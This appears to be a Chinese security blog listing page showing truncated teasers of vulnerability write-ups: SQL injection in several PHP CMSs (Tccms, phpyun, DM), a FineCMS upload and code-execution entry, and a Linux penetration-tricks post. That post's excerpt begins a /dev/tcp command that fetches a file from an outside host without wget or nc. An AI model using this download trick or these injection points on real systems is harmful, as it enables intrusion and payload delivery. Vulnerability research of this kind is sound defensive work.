因为测试模板。首先解决了私信问题。然后来到了投稿的地方在文件dmeng2.0/author.php 167行开始
01月01日332 views评论get
id
Tccms sql注入#2
常量未定义。看到 /system/core/controller.class.php[php]private function forceAttack() {$attack = M...
01月01日348 views评论get
php
phpyun SQL注入
在/model/qqconnect.class.php文件中: [php] function cert_action(){ $id=$_GET['id']; $arr=@explo...
12月31日漏洞时代355 views评论id
php
Linux常用渗透小技巧
1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...
11月21日moonsec_com327 views评论export
linux
DM企业建站系统前台盲注
前台cookie 时间盲注 该套cms主要的安全措施为htmlentities,在POST&&GET的输入点做了html实体化的操作,但是这并不转义单引号(默认不转...
05月19日颓废's Blog717 views评论get
post
FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行多个漏洞
2